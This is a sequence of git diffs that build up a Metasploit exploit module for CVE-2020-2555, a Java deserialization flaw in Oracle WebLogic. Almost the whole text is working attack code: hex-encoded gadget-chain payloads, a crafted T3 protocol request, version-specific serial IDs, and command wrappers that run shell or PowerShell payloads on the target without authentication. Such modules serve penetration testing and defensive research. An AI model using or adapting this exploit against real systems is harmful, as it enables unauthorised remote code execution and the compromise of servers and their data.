     payload_obj << '71'                                   # TC_REFERENCE
     payload_obj << '007e0001'                             # handle
-    # -----------------------------
-    #payload_obj << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
-    #payload_obj << '0034'                                 # Class name length: 52
-    #payload_obj << '636f6d2e74616e676f73'                 # com.tangosol.util.filter.AbstractQueryRecorderFilter
-    #payload_obj << '6f6c2e7574696c2e6669'
-    #payload_obj << '6c7465722e4162737472'
-    #payload_obj << '61637451756572795265'
-    #payload_obj << '636f7264657246696c74'
-    #payload_obj << '6572'
-    #payload_obj << 'f3b98201f680eb90'                     # SerialVersionUID
-    #payload_obj << '020000'                               # Serializable, no fields
+
     unless @version_no == Gem::Version.new('12.1.3.0.0')
       payload_obj << add_class_desc
     end
-    # ----------------------------
+
     payload_obj << '7870'                                  # TC_ENDBLOCKDATA, TC_NULL
     payload_obj << '00000000'
     payload_obj << '00000000'
@@ -507,17 +496,17 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def add_class_desc
-   class_desc = ''
-   class_desc << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
-   class_desc << '0034'                                 # Class name length: 52
-   class_desc << '636f6d2e74616e676f73'                 # com.tangosol.util.filter.AbstractQueryRecorderFilter
-   class_desc << '6f6c2e7574696c2e6669'
-   class_desc << '6c7465722e4162737472'
-   class_desc << '61637451756572795265'
-   class_desc << '636f7264657246696c74'
-   class_desc << '6572'
-   class_desc << 'f3b98201f680eb90'                     # SerialVersionUID
-   class_desc << '020000'                               # Serializable, no fields
+    class_desc = ''
+    class_desc << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
+    class_desc << '0034'                                 # Class name length: 52
+    class_desc << '636f6d2e74616e676f73'                 # com.tangosol.util.filter.AbstractQueryRecorderFilter
+    class_desc << '6f6c2e7574696c2e6669'
+    class_desc << '6c7465722e4162737472'
+    class_desc << '61637451756572795265'
+    class_desc << '636f7264657246696c74'
+    class_desc << '6572'
+    class_desc << 'f3b98201f680eb90'                     # SerialVersionUID
+    class_desc << '020000'                               # Serializable, no fields
   end
 
   def add_tc_null

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Exploit::Remote::Tcp
+  include Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -26,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ],
           [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]
         ],
-      'Platform'       => %w{ unix win },
+      'Platform'       => %w{ unix linux win },
       'Payload'        =>
         {
         },
@@ -41,7 +42,9 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Unix',
             {
-              'Platform' => 'unix',
+              'Platform' => %w{ unix linux },
+              #'DefaultOptions'  => { 'Payload'  => 'cmd/unix/reverse' }
+              'CmdStagerFlavor' => 'printf'
             }
           ],
         ],
@@ -69,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
     sock.get_once
   end
 
-  def build_payload_obj
+  def build_payload_obj(payload_data)
     payload_obj = 'aced'                                  # STREAM_MAGIC
     payload_obj << '0005'                                 # STREAM_VERSION
     payload_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
@@ -368,14 +371,22 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_obj << '020000'                               # Serializable, no fields
     payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
     payload_obj << '00000003'
-    payload_obj << '740007'                               # String, length: 7
-    payload_obj << '2f62696e2f7368'                       # /bin/sh
-    payload_obj << '740002'                               # String, length: 2
-    payload_obj << '2d63'                                 # -c
-    payload_obj << '740017'                               # String, length: 23
-    payload_obj << '746f756368202f746d70'                 # touch /tmp/blah_ze_blah
-    payload_obj << '2f626c61685f7a655f62'
-    payload_obj << '6c6168'
+
+    payload_bin = format_payload(payload_data)
+    payload_obj << payload_bin
+
+    # Original data
+    # ---------------------------
+    # payload_obj << '740007'                               # String, length: 7
+    # payload_obj << '2f62696e2f7368'                       # /bin/sh
+    # payload_obj << '740002'                               # String, length: 2
+    # payload_obj << '2d63'                                 # -c
+    # payload_obj << '740017'                               # String, length: 23
+    # payload_obj << '746f756368202f746d70'                 # touch /tmp/blah_ze_blah
+    # payload_obj << '2f626c61685f7a655f62'
+    # payload_obj << '6c6168'
+    # ---------------------------
+
     payload_obj << '740004'                               # String, length: 4
     payload_obj << '65786563'                             # exec
     payload_obj << '7070'                                 # TC_NULL, TC_NULL
@@ -389,11 +400,242 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def t3_send(payload_obj)
+    request_obj = '000009f3'                                            # Original packet length
+    request_obj << '016501'                                             # CMD_IDENTIFY_REQUEST, flags
+    request_obj << 'ffffffffffffffff'
+    request_obj << '00000071'
+    request_obj << '0000ea60'
+    request_obj << '00000018432ec6'
+    request_obj << 'a2a63985b5af7d63e643'
+    request_obj << '83f42a6d92c9e9af0f94'
+    request_obj << '72027973720078720178'
+    request_obj << '720278700000000c0000'
+    request_obj << '00020000000000000000'
+    request_obj << '00000001007070707070'
+    request_obj << '700000000c0000000200'
+    request_obj << '00000000000000000000'
+    request_obj << '01007006'
+    request_obj << 'fe010000'                                           # separator
+    request_obj << 'aced0005'                                           # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372'                                               # TC_OBJECT, TC_CLASSDESC
+    request_obj << '001d'                                               # Class name length: 29
+    request_obj << '7765626c6f6769632e72'                               # weblogic.rjvm.ClassTableEntry
+    request_obj << '6a766d2e436c61737354'
+    request_obj << '61626c65456e747279'
+    request_obj << '2f52658157f4f9ed'                                   # SerialVersionUID
+    request_obj << '0c0000'                                             # flags?
+    request_obj << '787072'                                             # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
+    request_obj << '0024'                                               # Class name length: 36
+    request_obj << '7765626c6f6769632e63'                               # weblogic.common.internal.PackageInfo
+    request_obj << '6f6d6d6f6e2e696e7465'
+    request_obj << '726e616c2e5061636b61'
+    request_obj << '6765496e666f'
+    request_obj << 'e6f723e7b8ae1ec9'                                   # SerialVersionUID
+    request_obj << '020009'                                             # Serializable, 9 fields
+    request_obj << '490005'                                             # Field type: Int, field name length: 5
+    request_obj << '6d616a6f72'                                         # major
+    request_obj << '490005'                                             # Field type: Int, field name length: 5
+    request_obj << '6d696e6f72'                                         # minor
+    request_obj << '49000b'                                             # Field type: Int, field name length: 11
+    request_obj << '70617463685570646174'                               # patchUpdate
+    request_obj << '65'
+    request_obj << '49000c'                                             # Field type: Int, field name length: 12
+    request_obj << '726f6c6c696e67506174'                               # rollingPatch
+    request_obj << '6368'
+    request_obj << '49000b'                                             # Field type: Int, field name length: 11
+    request_obj << '73657276696365506163'                               # servicePack
+    request_obj << '6b'
+    request_obj << '5a000e'                                             # Field type: Z = Bool, field name length: 14
+    request_obj << '74656d706f7261727950'                               # temporaryPatch
+    request_obj << '61746368'
+    request_obj << '4c0009'                                             # Field type: Object, field name length: 9
+    request_obj << '696d706c5469746c65'                                 # implTitle
+    request_obj << '740012'                                             # String, length: 18
+    request_obj << '4c6a6176612f6c616e67'                               # Ljava/lang/String;
+    request_obj << '2f537472696e673b'
+    request_obj << '4c000a'                                             # Field type: Object, field name length: 10
+    request_obj << '696d706c56656e646f72'                               # implVendor
+    request_obj << '71007e0003'                                         # TC_REFERENCE, handle
+    request_obj << '4c000b'                                             # Field type: Object, field name length: 11
+    request_obj << '696d706c56657273696f6e'                             # implVersion
+    request_obj << '71007e0003'                                         # TC_REFERENCE, handle
+    request_obj << '7870'                                               # TC_ENDBLOCKDATA, TC_NULL
+    request_obj << '7702'                                               # TC_ENDBLOCKDATA
+    request_obj << '000078'
+    request_obj << 'fe010000'                                           # separator
+
+    request_obj << payload_obj
+
+    request_obj << 'fe010000'                                            # separator
+    request_obj << 'aced0005'                                            # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372'                                                # TC_OBJECT, TC_CLASSDESC
+    request_obj << '001d'                                                # Class name length: 29
+    request_obj << '7765626c6f6769632e72'                                # weblogic.rjvm.ClassTableEntry
+    request_obj << '6a766d2e436c61737354'
+    request_obj << '61626c65456e747279'
+    request_obj << '2f52658157f4f9ed'                                    # SerialVersionUID
+    request_obj << '0c0000'
+    request_obj << '787072'                                              # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
+    request_obj << '0021'                                                # Class name length: 33
+    request_obj << '7765626c6f6769632e63'                                # weblogic.common.internal.PeerInfo
+    request_obj << '6f6d6d6f6e2e696e7465'
+    request_obj << '726e616c2e5065657249'
+    request_obj << '6e666f'
+    request_obj << '585474f39bc908f1'                                    # SerialVersionUID
+    request_obj << '020007'                                              # Serializable, 7 fields
+    request_obj << '490005'                                              # Field type: Int, field name length: 5
+    request_obj << '6d616a6f72'                                          # major
+    request_obj << '490005'                                              # Field type: Int, field name length: 5
+    request_obj << '6d696e6f72'                                          # minor
+    request_obj << '49000b'                                              # Field type: Int, field name length: 11
+    request_obj << '70617463685570646174'                                # patchUpdate
+    request_obj << '65'
+    request_obj << '49000c'                                              # Field type: Int, field name length: 12
+    request_obj << '726f6c6c696e67506174'                                # rollingPatch
+    request_obj << '6368'
+    request_obj << '49000b'                                              # Field type: Int, field name length: 11
+    request_obj << '73657276696365506163'                                # servicePack
+    request_obj << '6b'
+    request_obj << '5a000e'                                              # Field type: Z = Bool, field name length: 14
+    request_obj << '74656d706f7261727950'                                # temporaryPatch
+    request_obj << '61746368'
+    request_obj << '5b0008'                                              # Field type: Array, field name length: 8
+    request_obj << '7061636b61676573'                                    # packages
+    request_obj << '740027'                                              # String, length: 39
+    request_obj << '5b4c7765626c6f676963'                                # [Lweblogic/common/internal/PackageInfo;
+    request_obj << '2f636f6d6d6f6e2f696e'
+    request_obj << '7465726e616c2f506163'
+    request_obj << '6b616765496e666f3b'
+    request_obj << '7872'                                                # TC_ENDBLOCKDATA, TC_CLASSDESC
+    request_obj << '0024'                                                # Class name length: 36
+    request_obj << '7765626c6f6769632e63'                                # weblogic.common.internal.VersionInfo
+    request_obj << '6f6d6d6f6e2e696e7465'
+    request_obj << '726e616c2e5665727369'
+    request_obj << '6f6e496e666f'
+    request_obj << '972245516452463e'                                    # SerialVersionUID
+    request_obj << '020003'                                              # Serializable, 3 fields
+    request_obj << '5b0008'                                              # Field type: Array, field name length: 8
+    request_obj << '7061636b61676573'                                    # packages
+    request_obj << '71007e0003'                                          # TC_REFERENCE, handle
+    request_obj << '4c000e'                                              # Field type: Object, field name length: 14
+    request_obj << '72656c65617365566572'                                # releaseVersion
+    request_obj << '73696f6e'
+    request_obj << '740012'                                              # String, length: 18
+    request_obj << '4c6a6176612f6c616e67'                                # Ljava/lang/String;
+    request_obj << '2f537472696e673b'
+    request_obj << '5b0012'                                              # Field type: Array, field name length: 18
+    request_obj << '76657273696f6e496e66'                                # versionInfoAsBytes
+    request_obj << '6f41734279746573'
+    request_obj << '740002'                                              # String, length: 2
+    request_obj << '5b42'                                                # [B
+    request_obj << '7872'                                                # TC_ENDBLOCKDATA, TC_CLASSDESC
+    request_obj << '0024'                                                # Class name length: 36
+    request_obj << '7765626c6f6769632e63'                                # weblogic.common.internal.PackageInfo
+    request_obj << '6f6d6d6f6e2e696e7465'
+    request_obj << '726e616c2e5061636b61'
+    request_obj << '6765496e666f'
+    request_obj << 'e6f723e7b8ae1ec9'                                    # SerialVersionUID
+    request_obj << '020009'                                              # Serializable, 9 fields
+    request_obj << '490005'                                              # Field type: Int, field name length: 5
+    request_obj << '6d616a6f72'                                          # major
+    request_obj << '490005'                                              # Field type: Int, field name length: 5
+    request_obj << '6d696e6f72'                                          # minor
+    request_obj << '49000b'                                              # Field type: Int, field name length: 11
+    request_obj << '70617463685570646174'                                # patchUpdate
+    request_obj << '65'
+    request_obj << '49000c'                                              # Field type: Int, field name length: 12
+    request_obj << '726f6c6c696e67506174'                                # rollingPatch
+    request_obj << '6368'
+    request_obj << '49000b'                                              # Field type: Int, field name length: 11
+    request_obj << '73657276696365506163'                                # servicePack
+    request_obj << '6b'
+    request_obj << '5a000e'                                              # Field type: Z = Bool, field name length: 14
+    request_obj << '74656d706f7261727950'                                # temporaryPatch
+    request_obj << '61746368'
+    request_obj << '4c0009'                                              # Field type: Object, field name length: 9
+    request_obj << '696d706c5469746c65'                                  # implTitle
+    request_obj << '71007e0005'                                          # TC_REFERENCE, handle
+    request_obj << '4c000a'                                              # Field type: Object, field name length: 10
+    request_obj << '696d706c56656e646f72'                                # implVendor
+    request_obj << '71007e0005'                                          # TC_REFERENCE, handle
+    request_obj << '4c000b'                                              # Field type: Object, field name length: 11
+    request_obj << '696d706c56657273696f'                                # implVersion
+    request_obj << '6e'
+    request_obj << '71007e0005'                                          # TC_REFERENCE, handle
+    request_obj << '7870'                                                # TC_ENDBLOCKDATA, TC_NULL
+    request_obj << '7702000078'                                          # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA
+    request_obj << 'fe00ff'                                              # separator
+    request_obj << 'fe010000'
+    request_obj << 'aced0005'                                            # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372'                                                # TC_OBJECT, TC_CLASSDESC
+    request_obj << '0013'                                                # Class name length: 19
+    request_obj << '7765626c6f6769632e72'                                # weblogic.rjvm.JVMID
+    request_obj << '6a766d2e4a564d4944'
+    request_obj << 'dc49c23ede121e2a'                                    # SerialVersionUID
+    request_obj << '0c0000'
+    request_obj << '787077'                                              # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
+    request_obj << '4621'
+    request_obj << '000000000000000000'
+    request_obj << '09'                                                  # length: 9
+    request_obj << '3132372e302e312e31'                                  # 127.0.1.1
+    request_obj << '000b'                                                # length: 11
+    request_obj << '75732d6c2d627265656e'                                # us-l-breens
+    request_obj << '73'
+    request_obj << 'a53caff10000000700'
+    request_obj << '001b59'
+    request_obj << 'ffffffffffffffffffff'
+    request_obj << 'ffffffffffffffffffff'
+    request_obj << 'ffffffff'
+    request_obj << '0078'
+    request_obj << 'fe010000'                                            # separator
+    request_obj << 'aced0005'                                            # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372'                                                # TC_OBJECT, TC_CLASSDESC
+    request_obj << '0013'                                                # Class name length: 19
+    request_obj << '7765626c6f6769632e72'                                # weblogic.rjvm.JVMID
+    request_obj << '6a766d2e4a564d4944'
+    request_obj << 'dc49c23ede121e2a'                                    # SerialVersionUID
+    request_obj << '0c0000'
+    request_obj << '787077'                                              # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
+    request_obj << '1d0181401281'
+    request_obj << '34bf427600093132372e'
+    request_obj << '302e312e31a53caff1'
+    request_obj << '000000000078'
+
+    new_len = (request_obj.length / 2).to_s(16).rjust(8, '0')
+    request_obj[0, 8] = new_len
+
+    sock.put([request_obj].pack('H*'))
+    sleep(1)
+    sock.get_once
+  end
+
+  def format_payload(payload_cmd)
+    print_status('Formatting payload...')
+    payload_arr = payload_cmd.split(' ', 3)
+
+    formatted_payload = ''
+    payload_arr.each do |part|
+      formatted_payload << '74' # denotes a string
+      formatted_payload << part.length.to_s(16).rjust(4, '0')
+      formatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join
+    end
+
+    formatted_payload
+  end
+
+  def execute_command(cmd, opts={})
+    cmd.prepend('/bin/sh -c ')
+    cmd = build_payload_obj(cmd)
+    t3_send(cmd)
   end
 
   def exploit
     connect
 
-    output = t3_handshake
+    print_status('Sending handshake...')
+    t3_handshake
+
+    print_status('Sending object...')
+    execute_cmdstager(nodelete: true)
   end
 end

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -14,6 +14,12 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Weblogic Deserialize BadAttributeValueExpException',
       'Description'    => %q(
+        There exists an object deserialization vulnerability
+        in multiple versions of WebLogic.
+
+        Unauthenticated remote code execution can be achieved
+        by sending a serialized BadAttributeValueExpException object
+        over T3 to vulnerable WebLogic servers.
       ),
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -71,10 +77,10 @@ class MetasploitModule < Msf::Exploit::Remote
     /WebLogic\s+Server\s+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res
     return CheckCode::Unknown('Failed to detect WebLogic') unless version
 
-    @version_no = version
+    @version_no = Gem::Version.new(version)
     print_status("WebLogic version detected: #{@version_no}")
 
-    return CheckCode::Appears if versions.include?(Gem::Version.new(@version_no))
+    return CheckCode::Appears if versions.include?(@version_no)
 
     CheckCode::Detected('Version of WebLogic is not vulnerable')
   end
@@ -232,9 +238,9 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_obj << '0024'                                 # Class name length: 36
     payload_obj << '636f6d2e74616e676f73'                 # com.tangosol.util.filter.LimitFilter
     payload_obj << '6f6c2e7574696c2e6669'
-    payload_obj << '6c7465722e4c696d6974'                 # difference in versions 12.2.1.4/12.2.1.3 starts here
+    payload_obj << '6c7465722e4c696d6974'
     payload_obj << '46696c746572'
-    payload_obj << '954e4590be89865f'                     # SerialVersionUID
+    payload_obj << limit_filter_uid                       # SerialVersionUID
     payload_obj << '020006'                               # Serializable, 6 fields
     payload_obj << '49000b'                               # Field type: Integer, field name length: 11
     payload_obj << '6d5f635061676553697a65'               # m_cPageSize
@@ -281,7 +287,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_obj << '74726163746f722e4368'
     payload_obj << '61696e65644578747261'
     payload_obj << '63746f72'
-    payload_obj << '435b250b72f63db5'                     # SerialVersionUID
+    payload_obj << chained_extractor_uid                  # SerialVersionUID
     payload_obj << '020000'                               # Serializable, no fields
     payload_obj << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
     payload_obj << '0036'                                 # Class name length: 54
@@ -307,7 +313,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_obj << '74726163746f722e4162'
     payload_obj << '73747261637445787472'
     payload_obj << '6163746f72'
-    payload_obj << '9b1be18ed70100e5'                     # SerialVersionUID
+    payload_obj << abstract_extractor_uid                 # SerialVersionUID
     payload_obj << '020001'                               # Serializable, 1 field
     payload_obj << '490009'                               # Field type: Integer, field name length: 9
     payload_obj << '6d5f6e546172676574'                   # m_nTarget
@@ -331,13 +337,15 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_obj << '74726163746f722e5265'
     payload_obj << '666c656374696f6e4578'
     payload_obj << '74726163746f72'
-    payload_obj << '1f62f564b951b614'                     # SerialVersionUID
-    payload_obj << '020002'                               # Serializable, two fields
+    payload_obj << reflection_extractor_uid               # SerialVersionUID
+    payload_obj << '02000'                                # Serializable, variable fields orig: 020002
+    payload_obj << reflect_extract_count
     payload_obj << '5b0009'                               # Field type: Array, field name length: 9
     payload_obj << '6d5f616f506172616d'                   # m_aoParam
     payload_obj << '740013'                               # String, length: 19
     payload_obj << '5b4c6a6176612f6c616e'                 # [Ljava/lang/Object;
     payload_obj << '672f4f626a6563743b'
+    payload_obj << add_sect
     payload_obj << '4c0009'                               # Object, length: 9
     payload_obj << '6d5f734d6574686f64'                   # m_sMethod
     payload_obj << '71'                                   # TC_REFERENCE
@@ -363,6 +371,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_obj << '020000'                               # Serializable, no fields
     payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
     payload_obj << '00000000'
+    payload_obj << add_tc_null
     payload_obj << '740009'                               # String, length: 9
     payload_obj << '6765744d6574686f64'                   # getMethod
     payload_obj << '7371'                                 # TC_OBJECT, TC_REFERENCE
@@ -375,6 +384,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_obj << '71'                                   # TC_REFERENCE
     payload_obj << '007e0025'                             # handle
     payload_obj << '00000000'
+    payload_obj << add_tc_null
     payload_obj << '740006'                               # TC_STRING, length: 6
     payload_obj << '696e766f6b65'                         # invoke
     payload_obj << '7371'                                 # TC_OBJECT, TC_REFERENCE
@@ -406,6 +416,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # payload_obj << '2f626c61685f7a655f62'
     # payload_obj << '6c6168'
     # ---------------------------
+    payload_obj << add_tc_null
 
     payload_obj << '740004'                               # String, length: 4
     payload_obj << '65786563'                             # exec
@@ -414,9 +425,73 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_obj << '0011'                                 # Class name length: 17
     payload_obj << '6a6176612e6c616e672e'                 # java.lang.Runtime
     payload_obj << '52756e74696d65'
-    payload_obj << '0000000000000000'
-    payload_obj << '000000'
+    payload_obj << '00000000000000000000'
+    payload_obj << '00'
     payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+  end
+
+  def limit_filter_uid
+    case @version_no
+    when Gem::Version.new('12.2.1.3')
+      return 'ab2901b976c4e271'
+    else
+      return '954e4590be89865f'
+    end
+  end
+
+  def chained_extractor_uid
+    case @version_no
+    when Gem::Version.new('12.2.1.3')
+      return '06ee10433a4cc4b4'
+    else
+      return '435b250b72f63db5'
+    end
+  end
+
+  def abstract_extractor_uid
+    case @version_no
+    when Gem::Version.new('12.2.1.3')
+      return '752289ad4d460138'
+    else
+      return '9b1be18ed70100e5'
+    end
+  end
+
+  def reflection_extractor_uid
+    case @version_no
+    when Gem::Version.new('12.2.1.3')
+      return '87973791b26429dd'
+    else
+      return '1f62f564b951b614'
+    end
+  end
+
+  def reflect_extract_count
+    case @version_no
+    when Gem::Version.new('12.2.1.3')
+      return '3'
+    else
+      return '2'
+    end
+  end
+
+  def add_sect
+    sect = ''
+    if @version_no == Gem::Version.new('12.2.1.3')
+     sect << '4c0011'                 # Object, length: 17
+     sect << '6d5f657874726163746f'   # m_extractorCached
+     sect << '72436163686564'
+     sect << '71'                     # TC_REFERENCE
+     sect << '007e0001'               # handle
+    end
+
+    return sect
+  end
+
+  def add_tc_null
+    return '70' if @version_no == Gem::Version.new('12.2.1.3')
+
+    return ''
   end
 
   def t3_send(payload_obj)
@@ -646,7 +721,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, opts={})
     cmd.prepend('/bin/sh -c ')
-
     cmd = build_payload_obj(cmd)
 
     t3_send(cmd)

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::CmdStager
   include Msf::Exploit::Powershell
 
@@ -38,6 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'Platform' => %w[unix linux win],
         'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Privileged'  => true,
         'Targets' =>
           [
             [
@@ -64,8 +66,6 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([ Opt::RPORT(7001) ])
-
-    register_advanced_options([ OptBool.new('ForceExploit', [ false, 'Override check result', false ]) ])
   end
 
   def check
@@ -75,7 +75,6 @@ class MetasploitModule < Msf::Exploit::Remote
     sock.put(web_req)
     sleep(2)
     res = sock.get_once
-    disconnect
 
     versions = [ Gem::Version.new('12.1.3.0.0'), Gem::Version.new('12.2.1.3.0'), Gem::Version.new('12.2.1.4.0') ]
 
@@ -90,6 +89,28 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Appears if versions.include?(@version_no)
 
     CheckCode::Detected('Version of WebLogic is not vulnerable')
+  ensure
+    disconnect
+  end
+
+  def exploit
+    super
+
+    connect
+    print_status('Sending handshake...')
+    t3_handshake
+
+    if target.name == 'Windows'
+      win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })
+      win_obj.prepend('cmd.exe /c ')
+      win_obj = build_payload_obj(win_obj)
+      t3_send(win_obj)
+    else
+      execute_cmdstager
+    end
+
+  ensure
+    disconnect
   end
 
   def t3_handshake
@@ -439,58 +460,59 @@ class MetasploitModule < Msf::Exploit::Remote
   def limit_filter_uid
     case @version_no
     when Gem::Version.new('12.1.3.0.0')
-      return '99022596d7b45953'
+      '99022596d7b45953'
     when Gem::Version.new('12.2.1.3.0')
-      return 'ab2901b976c4e271'
+      'ab2901b976c4e271'
     else
-      return '954e4590be89865f'
+      '954e4590be89865f'
     end
   end
 
   def chained_extractor_uid
     case @version_no
     when Gem::Version.new('12.1.3.0.0')
-      return '889f81b0945d5b7f'
+      '889f81b0945d5b7f'
     when Gem::Version.new('12.2.1.3.0')
-      return '06ee10433a4cc4b4'
+      '06ee10433a4cc4b4'
     else
-      return '435b250b72f63db5'
+      '435b250b72f63db5'
     end
   end
 
   def abstract_extractor_uid
     case @version_no
     when Gem::Version.new('12.1.3.0.0')
-      return '658195303e723821'
+      '658195303e723821'
     when Gem::Version.new('12.2.1.3.0')
-      return '752289ad4d460138'
+      '752289ad4d460138'
     else
-      return '9b1be18ed70100e5'
+      '9b1be18ed70100e5'
     end
   end
 
   def reflection_extractor_uid
     case @version_no
     when Gem::Version.new('12.1.3.0.0')
-      return 'ee7ae995c02fb4a2'
+      'ee7ae995c02fb4a2'
     when Gem::Version.new('12.2.1.3.0')
-      return '87973791b26429dd'
+      '87973791b26429dd'
     else
-      return '1f62f564b951b614'
+      '1f62f564b951b614'
     end
   end
 
   def reflect_extract_count
     case @version_no
     when Gem::Version.new('12.2.1.3.0')
-      return '3'
+      '3'
     else
-      return '2'
+      '2'
     end
   end
 
   def add_sect
     sect = ''
+
     if @version_no == Gem::Version.new('12.2.1.3.0')
       sect << '4c0011' # Object, length: 17
       sect << '6d5f657874726163746f' # m_extractorCached
@@ -499,7 +521,7 @@ class MetasploitModule < Msf::Exploit::Remote
       sect << '007e0001' # handle
     end
 
-    return sect
+    sect
   end
 
   def add_class_desc
@@ -519,7 +541,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def add_tc_null
     return '70' if @version_no == Gem::Version.new('12.2.1.3.0')
 
-    return ''
+    ''
   end
 
   def t3_send(payload_obj)
@@ -752,24 +774,5 @@ class MetasploitModule < Msf::Exploit::Remote
     cmd = build_payload_obj(cmd)
 
     t3_send(cmd)
-  end
-
-  def exploit
-    unless check == CheckCode::Appears || datastore['ForceExploit']
-      fail_with(Failure::NotVulnerable, 'The target does not seem to be vulnerable')
-    end
-
-    connect
-    print_status('Sending handshake...')
-    t3_handshake
-
-    if target.name == 'Windows'
-      win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })
-      win_obj.prepend('cmd.exe /c ')
-      win_obj = build_payload_obj(win_obj)
-      t3_send(win_obj)
-    else
-      execute_cmdstager
-    end
   end
 end

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -14,12 +14,12 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Weblogic Deserialize BadAttributeValueExpException',
       'Description'    => %q(
-        There exists an object deserialization vulnerability
+        There exists a Java object deserialization vulnerability
         in multiple versions of WebLogic.
 
         Unauthenticated remote code execution can be achieved
         by sending a serialized BadAttributeValueExpException object
-        over T3 to vulnerable WebLogic servers.
+        over the T3 protocol to vulnerable WebLogic servers.
       ),
       'License'        => MSF_LICENSE,
       'Author'         =>

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'Platform' => %w[unix linux win],
         'Arch' => [ ARCH_X86, ARCH_X64 ],
-        'Privileged'  => true,
+        'Privileged'  => false,
         'Targets' =>
           [
             [

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ],
         ],
-      'DisclosureDate' => "2020-01-15",
+      'DisclosureDate' => '2020-01-15',
       'DefaultTarget'  => 0
     ))
 

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -11,54 +11,57 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Powershell
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Weblogic Deserialize BadAttributeValueExpException',
-      'Description'    => %q(
-        There exists a Java object deserialization vulnerability
-        in multiple versions of WebLogic.
+    super(
+      update_info(
+        info,
+        'Name' => 'Weblogic Deserialize BadAttributeValueExpException',
+        'Description' => %q{
+          There exists a Java object deserialization vulnerability
+          in multiple versions of WebLogic.
 
-        Unauthenticated remote code execution can be achieved
-        by sending a serialized BadAttributeValueExpException object
-        over the T3 protocol to vulnerable WebLogic servers.
-      ),
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-      [
-        'Jang',       # Vuln Discovery
-        'Y4er',       # PoC
-        'Shelby Pace' # Metasploit Module
-      ],
-      'References'     =>
+          Unauthenticated remote code execution can be achieved
+          by sending a serialized BadAttributeValueExpException object
+          over the T3 protocol to vulnerable WebLogic servers.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
         [
-          [ 'CVE', '2020-2555' ],
